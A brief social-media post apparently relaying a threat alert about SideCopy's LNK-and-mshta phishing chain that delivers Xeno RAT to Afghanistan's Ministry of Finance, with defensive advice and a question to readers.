SideCopy targets Afghanistan's Ministry of Finance: Xeno RAT via LNK phishing in Pashto

Colleagues, an important cyber-security alert: SideCopy targeted Afghanistan's Ministry of Finance by sending ZIP archives containing LNK files in Pashto — Operation XENOFISCAL.
Brief:
- The LNK invoked mshta.exe to fetch an HTA from a compromised domain.
- Xeno RAT 1.8.7 is deployed via a DLL loader, achieving persistence in the registry and enabling remote control.
- Capabilities include SOCKS5 tunneling, keylogging, screenshots, camera/microphone access and artifact removal.
Why it matters: demonstrates targeted attacks and fragile delivery chains — attachment filtering and blocking mshta are critical.
What practices do you employ to defend against such chains?
#cybersecurity #phishing #XenoRAT #APT


Latest comments
No comments yet.